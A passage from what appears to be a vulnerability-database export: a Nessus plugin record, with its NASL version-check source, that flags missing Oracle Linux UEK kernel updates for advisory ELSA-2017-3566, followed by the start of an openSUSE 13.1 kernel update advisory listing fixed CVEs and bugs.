(CVE-2017-2583)\n\n - The tcp_splice_read function in net/ipv4/tcp.c in the Linux kernel before 4.9.11 allows remote attackers to cause a denial of service (infinite loop and soft lockup) via vectors involving a TCP packet with the URG flag. (CVE-2017-6214)\n\n - The xfrm_replay_verify_len function in net/xfrm/xfrm_user.c in the Linux kernel through 4.10.6 does not validate certain size data after an XFRM_MSG_NEWAE update, which allows local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) by leveraging the CAP_NET_ADMIN capability, as demonstrated during a Pwn2Own competition at CanSecWest 2017 for the Ubuntu 16.10 linux- image-* package 4.8.0.41.52. (CVE-2017-7184)\n\n - The ext4_fill_super function in fs/ext4/super.c in the Linux kernel through 4.9.8 does not properly validate meta block groups, which allows physically proximate attackers to cause a denial of service (out- of-bounds read and system crash) via a crafted ext4 image. (CVE-2016-10208)\n\n - Race condition in the sctp_wait_for_sndbuf function in net/sctp/socket.c in the Linux kernel before 4.9.11 allows local users to cause a denial of service (assertion failure and panic) via a multithreaded application that peels off an association in a certain buffer-full state. (CVE-2017-5986)\n\n - The NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the end of a buffer, which allows remote attackers to trigger pointer-arithmetic errors or possibly have unspecified other impact via crafted requests, related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c.\n (CVE-2017-7895)\n\n - The vhost_dev_ioctl function in drivers/vhost/vhost.c in the Linux kernel before 4.1.5 allows local users to cause a denial of service (memory consumption) via a VHOST_SET_LOG_FD ioctl call that triggers permanent file-descriptor allocation. (CVE-2015-6252)\n\n - The KEYS subsystem in the Linux kernel before 3.18 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving a NULL value for a certain match field, related to the keyring_search_iterator function in keyring.c. (CVE-2017-2647)\n\n - drivers/usb/serial/whiteheat.c in the Linux kernel before 4.2.4 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact via a crafted USB device. NOTE: this ID was incorrectly used for an Apache Cordova issue that has the correct ID of CVE-2015-8320. (CVE-2015-5257)\n\n - The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel before 4.5 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint. (CVE-2016-2782)\n\n - The do_shmat function in ipc/shm.c in the Linux kernel through 4.9.12 does not restrict the address calculated by a certain rounding operation, which allows local users to map page zero, and consequently bypass a protection mechanism that exists for the mmap system call, by making crafted shmget and shmat system calls in a privileged context. (CVE-2017-5669)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3566)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5257", "CVE-2015-6252", "CVE-2015-8320", "CVE-2015-9731", "CVE-2016-10088", "CVE-2016-10142", "CVE-2016-10208", "CVE-2016-10229", "CVE-2016-2782", "CVE-2016-7910", "CVE-2016-8399", "CVE-2016-9644", "CVE-2017-2583", "CVE-2017-2647", "CVE-2017-5669", "CVE-2017-5986", "CVE-2017-6214", "CVE-2017-7184", "CVE-2017-7187", "CVE-2017-7895"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.18.2.el6uek", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.18.2.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2017-3566.NASL", "href": "https://www.tenable.com/plugins/nessus/100234", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3566.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100234);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\n \"CVE-2015-5257\",\n \"CVE-2015-6252\",\n \"CVE-2015-9731\",\n \"CVE-2016-2782\",\n \"CVE-2016-7910\",\n \"CVE-2016-8399\",\n \"CVE-2016-9644\",\n \"CVE-2016-10088\",\n \"CVE-2016-10142\",\n \"CVE-2016-10208\",\n \"CVE-2016-10229\",\n \"CVE-2017-2583\",\n \"CVE-2017-2647\",\n \"CVE-2017-5669\",\n \"CVE-2017-5986\",\n \"CVE-2017-6214\",\n \"CVE-2017-7184\",\n \"CVE-2017-7187\",\n \"CVE-2017-7895\"\n );\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3566)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe ELSA-2017-3566 advisory.\n\n - The load_segment_descriptor implementation in arch/x86/kvm/emulate.c in the Linux kernel before 4.9.5\n improperly emulates a MOV SS, NULL selector instruction, which allows guest OS users to cause a denial\n of service (guest OS crash) or gain guest OS privileges via a crafted application. (CVE-2017-2583)\n\n - The tcp_splice_read function in net/ipv4/tcp.c in the Linux kernel before 4.9.11 allows remote attackers\n to cause a denial of service (infinite loop and soft lockup) via vectors involving a TCP packet with the\n URG flag. (CVE-2017-6214)\n\n - The xfrm_replay_verify_len function in net/xfrm/xfrm_user.c in the Linux kernel through 4.10.6 does not\n validate certain size data after an XFRM_MSG_NEWAE update, which allows local users to obtain root\n privileges or cause a denial of service (heap-based out-of-bounds access) by leveraging the CAP_NET_ADMIN\n capability, as demonstrated during a Pwn2Own competition at CanSecWest 2017 for the Ubuntu 16.10 linux-\n image-* package 4.8.0.41.52. (CVE-2017-7184)\n\n - The ext4_fill_super function in fs/ext4/super.c in the Linux kernel through 4.9.8 does not properly\n validate meta block groups, which allows physically proximate attackers to cause a denial of service (out-\n of-bounds read and system crash) via a crafted ext4 image. (CVE-2016-10208)\n\n - Race condition in the sctp_wait_for_sndbuf function in net/sctp/socket.c in the Linux kernel before 4.9.11\n allows local users to cause a denial of service (assertion failure and panic) via a multithreaded\n application that peels off an association in a certain buffer-full state. (CVE-2017-5986)\n\n - The NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the\n end of a buffer, which allows remote attackers to trigger pointer-arithmetic errors or possibly have\n unspecified other impact via crafted requests, related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c.\n (CVE-2017-7895)\n\n - The vhost_dev_ioctl function in drivers/vhost/vhost.c in the Linux kernel before 4.1.5 allows local users\n to cause a denial of service (memory consumption) via a VHOST_SET_LOG_FD ioctl call that triggers\n permanent file-descriptor allocation. (CVE-2015-6252)\n\n - The KEYS subsystem in the Linux kernel before 3.18 allows local users to gain privileges or cause a denial\n of service (NULL pointer dereference and system crash) via vectors involving a NULL value for a certain\n match field, related to the keyring_search_iterator function in keyring.c. (CVE-2017-2647)\n\n - drivers/usb/serial/whiteheat.c in the Linux kernel before 4.2.4 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact\n via a crafted USB device. NOTE: this ID was incorrectly used for an Apache Cordova issue that has the\n correct ID of CVE-2015-8320. (CVE-2015-5257)\n\n - The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel before 4.5 allows physically\n proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly\n have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in\n endpoint. (CVE-2016-2782)\n\n - The do_shmat function in ipc/shm.c in the Linux kernel through 4.9.12 does not restrict the address\n calculated by a certain rounding operation, which allows local users to map page zero, and consequently\n bypass a protection mechanism that exists for the mmap system call, by making crafted shmget and shmat\n system calls in a privileged context. (CVE-2017-5669)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2017-3566.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7895\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.18.2.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.18.2.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6 / 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['3.8.13-118.18.2.el6uek', '3.8.13-118.18.2.el7uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2017-3566');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '3.8';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'dtrace-modules-3.8.13-118.18.2.el6uek-0.4.5-3.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-3.8.13-118.18.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-3.8.13'},\n {'reference':'kernel-uek-debug-3.8.13-118.18.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-3.8.13'},\n {'reference':'kernel-uek-debug-devel-3.8.13-118.18.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-3.8.13'},\n {'reference':'kernel-uek-devel-3.8.13-118.18.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-3.8.13'},\n {'reference':'kernel-uek-doc-3.8.13-118.18.2.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-3.8.13'},\n {'reference':'kernel-uek-firmware-3.8.13-118.18.2.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-3.8.13'},\n {'reference':'dtrace-modules-3.8.13-118.18.2.el7uek-0.4.5-3.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-3.8.13-118.18.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-3.8.13'},\n {'reference':'kernel-uek-debug-3.8.13-118.18.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-3.8.13'},\n {'reference':'kernel-uek-debug-devel-3.8.13-118.18.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-3.8.13'},\n {'reference':'kernel-uek-devel-3.8.13-118.18.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-3.8.13'},\n {'reference':'kernel-uek-doc-3.8.13-118.18.2.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-3.8.13'},\n {'reference':'kernel-uek-firmware-3.8.13-118.18.2.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-3.8.13'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dtrace-modules-3.8.13-118.18.2.el6uek / dtrace-modules-3.8.13-118.18.2.el7uek / kernel-uek / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:41:19", "description": "====================================================================== The openSUSE 13.1 kernel was updated to 3.12.59 to receive various security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables handling could lead to a local privilege escalation. (bsc#986362)\n\n - CVE-2014-9717: fs/namespace.c in the Linux kernel processes MNT_DETACH umount2 system calls without verifying that the MNT_LOCKED flag is unset, which allowed local users to bypass intended access restrictions and navigate to filesystem locations beneath a mount by calling umount2 within a user namespace (bnc#928547).\n\n - CVE-2015-8539: The KEYS subsystem in the Linux kernel allowed local users to gain privileges or cause a denial of service (BUG) via crafted keyctl commands that negatively instantiate a key, related to security/keys/encrypted-keys/encrypted.c, security/keys/trusted.c, and security/keys/user_defined.c (bnc#958463).\n\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in the Linux kernel did not properly maintain a hub-interface data structure, which allowed physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device (bnc#968010 979064).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (stack memory consumption) via vectors involving crafted mmap calls for /proc pathnames, leading to recursive pagefault handling (bnc#983143).\n\n - CVE-2016-2143: The fork implementation in the Linux kernel on s390 platforms mishandled the case of four page-table levels, which allowed local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted application, related to arch/s390/include/asm/mmu_context.h and arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference or double free, and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-2185: The ati_remote2_probe function in drivers/input/misc/ati_remote2.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971124).\n\n - CVE-2016-2186: The powermate_probe function in drivers/input/misc/powermate.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970958).\n\n - CVE-2016-2188: The iowarrior_probe function in drivers/usb/misc/iowarrior.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970956).\n\n - CVE-2016-2782: The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint (bnc#961512 968670).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not limit the amount of unread data in pipes, which allowed local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes (bnc#970948 bnc#974646).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not validate certain offset fields, which allowed local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in drivers/usb/serial/mct_u232.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted USB device without two interrupt-in endpoint descriptors (bnc#970955).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in drivers/usb/serial/mct_u232.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted USB device without two interrupt-in endpoint descriptors (bnc#970955).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both an interrupt-in and an interrupt-out endpoint descriptor, related to the cypress_generic_port_probe and cypress_open functions (bnc#970970).\n\n - CVE-2016-3138: The acm_probe function in drivers/usb/class/cdc-acm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both a control and a data endpoint descriptor (bnc#970911 970970).\n\n - CVE-2016-3140: The digi_port_init function in drivers/usb/serial/digi_acceleport.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970892).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux kernel mishandled destruction of device objects, which allowed guest OS users to cause a denial of service (host OS networking outage) by arranging for a large number of IP addresses (bnc#971360).\n\n - CVE-2016-3689: The ims_pcu_parse_cdc_data function in drivers/input/misc/ims-pcu.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) via a USB device without both a master and a slave interface (bnc#971628).\n\n - CVE-2016-3951: Double free vulnerability in drivers/net/usb/cdc_ncm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) or possibly have unspecified other impact by inserting a USB device with an invalid USB descriptor (bnc#974418).\n\n - CVE-2016-4482: The proc_connectinfo function in drivers/usb/core/devio.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via a crafted USBDEVFS_CONNECTINFO ioctl call (bnc#978401 bsc#978445).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in net/core/rtnetlink.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-4569: The snd_timer_user_params function in sound/core/timer.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface (bnc#979213).\n\nThe following non-security bugs were fixed :\n\n - ALSA: timer: Call notifier in the same spinlock (bsc#973378).\n\n - ALSA: timer: Protect the whole snd_timer_close() with open race (bsc#973378).\n\n - ALSA: timer: Sync timer deletion at closing the system timer (bsc#973378).\n\n - ALSA: timer: Use mod_timer() for rearming the system timer (bsc#973378).\n\n - Add fs/ceph as a supported module.\n\n - Add mainline tags to some hyperv patches\n\n - Btrfs: do not collect ordered extents when logging that inode exists (bsc#977685).\n\n - Btrfs: fix deadlock between direct IO reads and buffered writes (bsc#973855).\n\n - Btrfs: fix empty symlink after creating symlink and fsync parent dir (bsc#977685).\n\n - Btrfs: fix file loss on log replay after renaming a file and fsync (bsc#977685).\n\n - Btrfs: fix file/data loss caused by fsync after rename and new inode (bsc#977685).\n\n - Btrfs: fix for incorrect directory entries after fsync log replay (bsc#957805, bsc#977685).\n\n - Btrfs: fix loading of orphan roots leading to BUG_ON (bsc#972844).\n\n - Btrfs: fix race between fsync and lockless direct IO writes (bsc#977685).\n\n - Btrfs: fix unreplayable log after snapshot delete + parent dir fsync (bsc#977685).\n\n - Btrfs: teach backref walking about backrefs with underflowed offset values (bsc#975371).\n\n - CacheFiles: Fix incorrect test for in-memory object collision (bsc#971049).\n\n - CacheFiles: Handle object being killed before being set up (bsc#971049).\n\n - Ceph: Remove racey watch/notify event infrastructure (bsc#964727)\n\n - Driver: Vmxnet3: set CHECKSUM_UNNECESSARY for IPv6 packets (bsc#976739).\n\n - Drivers: hv: util: Pass the channel information during the init call (bnc#978527).\n\n - Drivers: hv: utils: Invoke the poll function after handshake (bnc#978527).\n\n - Drivers: hv: vmbus: Fix signaling logic in hv_need_to_signal_on_read().\n\n - Export helper function to set irq affinity in pci-hyperv.\n\n - FS-Cache: Add missing initialization of ret in cachefiles_write_page() (bsc#971049).\n\n - FS-Cache: Count culled objects and objects rejected due to lack of space (bsc#971049).\n\n - FS-Cache: Fix cancellation of in-progress operation (bsc#971049).\n\n - FS-Cache: Handle a new operation submitted against a killed object (bsc#971049).\n\n - FS-Cache: Move fscache_report_unexpected_submission() to make it more available (bsc#971049).\n\n - FS-Cache: Out of line fscache_operation_init() (bsc#971049).\n\n - FS-Cache: Permit fscache_cancel_op() to cancel in-progress operations too (bsc#971049).\n\n - FS-Cache: Put an aborted initialised op so that it is accounted correctly (bsc#971049).\n\n - FS-Cache: Reduce cookie ref count if submit fails (bsc#971049).\n\n - FS-Cache: Synchronise object death state change vs operation submission (bsc#971049).\n\n - FS-Cache: The operation cancellation method needs calling in more places (bsc#971049).\n\n - FS-Cache: Timeout for releasepage() (bsc#971049).\n\n - FS-Cache: When submitting an op, cancel it if the target object is dying (bsc#971049).\n\n - FS-Cache: fscache_object_is_dead() has wrong logic, kill it (bsc#971049).\n\n - Fix cifs_uniqueid_to_ino_t() function for s390x (bsc#944309)\n\n - Fix kabi issue (bsc#971049).\n\n - Import kabi files from kernel 3.12.55-52.42\n\n - Import kabi files from kernel 3.12.57-60.35\n\n - Input: i8042 - lower log level for 'no controller' message (bsc#945345).\n\n - KVM: x86: expose invariant tsc cpuid bit (v2) (bsc#971770).\n\n - NFSv4.1: do not use machine credentials for CLOSE when using 'sec=sys' (bsc#972003).\n\n - NVMe: Unify controller probe and resume (bsc#979347).\n\n - NVMe: init nvme queue before enabling irq (unknown bsc).\n\n - PCI/AER: Fix aer_inject error codes (bsc#931448).\n\n - PCI/AER: Log actual error causes in aer_inject (bsc#931448).\n\n - PCI/AER: Log aer_inject error injections (bsc#931448).\n\n - PCI/AER: Use dev_warn() in aer_inject (bsc#931448).\n\n - RDMA/ocrdma: Avoid reporting wrong completions in case of error CQEs (bsc#908151).\n\n - Remove VIOSRP_HOST_CONFIG_TYPE from ibmvstgt.c in patches.fixes/0001-ibmvscsi-remove-unsupported-host-conf ig-mad.patch. as well.\n\n - Revert 'scsi: fix soft lockup in scsi_remove_target() on module removal' (bsc#970609).\n\n - SUNRPC: Fix large reads on NFS/RDMA (bsc#908151).\n\n - SUNRPC: remove KERN_INFO from dprintk() call sites (bsc#908151).\n\n - USB: usbip: fix potential out-of-bounds write (bnc#975945).\n\n - Update patches.kernel.org/patch-3.12.55-56 references (add bsc#973570).\n\n - Update patches.suse/kgr-0102-add-TAINT_KGRAFT.patch (fate#313296 bsc#974406).\n\n - Use mainline variant of hyperv KVP IP failover patch (bnc#978527)\n\n - acpi: Disable ACPI table override when UEFI Secure Boot is enabled (bsc#970604).\n\n - acpi: Disable APEI error injection if securelevel is set (bsc#972891).\n\n - apparmor: Skip proc ns files (bsc#959514).\n\n - block: do not check request size in blk_cloned_rq_check_limits() (bsc#972124).\n\n - bnx2fc-Do-not-log-for-netevents-that-need-no-action.patc h\n\n - btrfs: do not return EBUSY on concurrent subvolume mounts (bsc#951844).\n\n - btrfs: handle non-fatal errors in btrfs_qgroup_inherit() (bsc#972951).\n\n - btrfs: qgroup: return EINVAL if level of parent is not higher than child's (bsc#972951).\n\n - cachefiles: perform test on s_blocksize when opening cache file (bsc#971049).\n\n - ceph fscache: Introduce a routine for uncaching single no data page from fscache (Fate#318586).\n\n - ceph fscache: Uncaching no data page from fscache in readpage() (Fate#318586).\n\n - ceph: Asynchronous IO support (Fate#318586).\n\n - ceph: Avoid to propagate the invalid page point (Fate#318586).\n\n - ceph: Clean up if error occurred in finish_read() (Fate#318586).\n\n - ceph: EIO all operations after forced umount (Fate#318586).\n\n - ceph: Implement writev/pwritev for sync operation (Fate#318586).\n\n - ceph: add acl for cephfs (Fate#318586).\n\n - ceph: add acl, noacl options for cephfs mount (Fate#318586).\n\n - ceph: add get_name() NFS export callback (Fate#318586).\n\n - ceph: add get_parent() NFS export callback (Fate#318586).\n\n - ceph: add imported caps when handling cap export message (Fate#318586).\n\n - ceph: add inline data to pagecache 